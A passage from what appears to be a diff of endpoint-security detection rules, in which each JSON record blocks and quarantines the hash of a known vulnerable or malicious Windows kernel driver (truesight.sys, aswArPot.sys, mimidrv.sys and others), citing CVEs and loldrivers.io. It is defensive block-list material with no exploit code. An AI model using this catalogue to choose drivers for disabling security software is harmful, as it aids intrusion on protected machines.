+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "300dd42952024fcdc8d3bd90bd8892ba391b016f4f7f57543bda6d2ce12d371b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04bc0990-91c5-5103-86cd-e58c14fa4ade", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454765Z", + "creation_date": "2026-03-23T11:45:30.454768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25454028a4f56d3c58747811a86be43397a6290d1a053bc30d97b41bf3c58c6f", + "comment": "Vulnerable Kernel Driver (aka jokercontroller.sys) [https://www.loldrivers.io/drivers/4c815256-2534-4476-b15d-7cbf24c80098/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04ca5a1c-6ffa-5da4-8acc-3eec3abfdcbc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606917Z", + "creation_date": "2026-03-23T11:45:29.606919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606924Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a902521c5f82ad9acac815229a00e6ed9137b8d49106b64147b088ff89d0f01", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04d06975-93bd-5453-bdf1-ac7a5049d4ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615748Z", + "creation_date": "2026-03-23T11:45:29.615750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615755Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d82a938dc7b0077a06d940bd3ce6097e3b02cdc254ec6fd863c0e526f2af69fa", + "comment": "MICRO-STAR vulnerable drivers 
(aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04e42d59-a467-5cc4-9bbe-3d1bbc3e1998", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454891Z", + "creation_date": "2026-03-23T11:45:30.454894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "407ca87833bd0931eec8005bb125e56d5765058c9b6422620aa95d8b2044239a", + "comment": "Vulnerable Kernel Driver (aka NICM.sys) [https://www.loldrivers.io/drivers/0f8e317e-ad2b-4b02-9f96-603bb8d28604/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04e603d7-2f2c-58b8-a465-e47c1484269b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985198Z", + "creation_date": 
"2026-03-23T11:45:29.985200Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985206Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d852810a7319e3249077a1b9f1317f6f4157a19bb99b90063d118c30c2c84ac2", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04fa0d38-9059-5ef5-9bc3-d5c472e45a78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153613Z", + "creation_date": "2026-03-23T11:45:31.153615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153621Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67437ca0f3ca0fe5ae7bbce6fc834e0252a936035d3d57bc069830c9d3ee2e15", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "04fdd464-f581-5107-877f-047f8a476e12", 
+ "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815473Z", + "creation_date": "2026-03-23T11:45:31.815475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb121a1776e70ee10b82d6818e6e91cd53966c498677c7d261b40d064be60831", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0506e24a-c838-5717-b346-0cf6040f7795", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969819Z", + "creation_date": "2026-03-23T11:45:29.969821Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.969826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6cb70c945e7b3723de1d334aa2fb97bb8ddb9f68e409deeb9988f446546a57c", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05076b32-cce0-5681-b423-97d1f96778bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468611Z", + "creation_date": "2026-03-23T11:45:30.468614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94f4bcc9b062406ee7468659c1710d3e0cb057c7b7194e15cd72845082138019", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "050cac9e-59ad-5881-a7b5-0a1b027ab859", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816635Z", + "creation_date": "2026-03-23T11:45:30.816637Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816643Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "defde359045213ae6ae278e2a92c5b4a46a74119902364c7957a38138e9c9bbd", + "comment": "Vulnerable Kernel Driver (aka avalueio.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0512b663-3484-5dd8-9571-f68300078c85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490919Z", + "creation_date": "2026-03-23T11:45:31.490922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a222868df05c425df8ac6b7945405c4ed61d9f81f0789171869226d156e9ac24", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05198561-b1db-5967-80b8-dc2c6b472487", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808865Z", + "creation_date": "2026-03-23T11:45:31.808885Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808891Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "746900af78ec0d7904d0cbb3969281cfb1d5ebedd53017cae6a27509062b8066", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05223dc4-5a8f-5cf8-9bb1-e4b41b418668", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156887Z", + "creation_date": "2026-03-23T11:45:31.156889Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156894Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18357003448d4db822b5eea10eefa18fd78646079ebd338a9e7ee210542b1103", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05272034-3189-51b2-a78a-1db537f5995f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150686Z", + "creation_date": "2026-03-23T11:45:31.150688Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150694Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83830685970d9094f7605289cfd06dcf1741e233216fd7dc2e43f0d3b0c90d79", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05323ac5-24e5-5052-8c24-e4de8f07eb7e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160345Z", + "creation_date": "2026-03-23T11:45:31.160347Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160353Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bed676cce59f13fe1ae3c07b1897deaba401840d822af8021790440eb9f3b7e2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0537b285-3d55-5512-afa9-b2deb2a4bfd2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146565Z", + "creation_date": 
"2026-03-23T11:45:31.146567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2946278067a6a60d88d842bfb9134731c73fb7accf734120182263cb785a4daf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "053923c3-5b72-51e5-9fbe-697e1af0393c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483064Z", + "creation_date": "2026-03-23T11:45:31.483068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483078Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1d12f7b06088c56e4ced1296b0d9614b1fa3042fcbb964685514dff0b297730", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "054436d8-92ca-5d17-ac0a-21b765e4cba5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613910Z", + "creation_date": "2026-03-23T11:45:29.613912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613918Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3fa4872fd2c286904a0cf37a392ef89fb6ba2a84fc9e1b66c70e0cb5ae28efa", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "054948f6-8d70-5ed0-9f64-0e63617990ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143183Z", + "creation_date": "2026-03-23T11:45:31.143185Z", + "enabled": true, + "block_on_agent": 
true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143190Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a38dbf377d4371911959762bc856b04ef38ee54b53b5b327977ccf23fec6c5b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "054fa1a1-6520-5ad2-bdb7-67da9220ff65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970019Z", + "creation_date": "2026-03-23T11:45:29.970021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "68043583bc2f3fc1ca11458e8b921dce2573afdc04bd20ba85eeb806d884eb6f", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0554a339-a44b-501b-8cdd-10413c5c5ccf", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828257Z", + "creation_date": "2026-03-23T11:45:30.828259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9d82863d3837c0074fd60fbf8ed69f082a0681d4d9945eba8488e8482c8bba31", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "055d0196-ad4c-52c1-9717-dd839c89c121", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151195Z", + "creation_date": "2026-03-23T11:45:31.151197Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151202Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f83e9c4122d25e9d32087c77d9391b46974b3d7090f369529ff2354d7d215b39", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0569fc76-6e58-5438-afe0-d117c1069bf3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609630Z", + "creation_date": "2026-03-23T11:45:29.609632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "05815517-72b3-5d65-81bb-6bacf04e9085", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617816Z", + "creation_date": "2026-03-23T11:45:29.617818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "058a7d7d-4b10-5ea9-b083-f536323e74c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 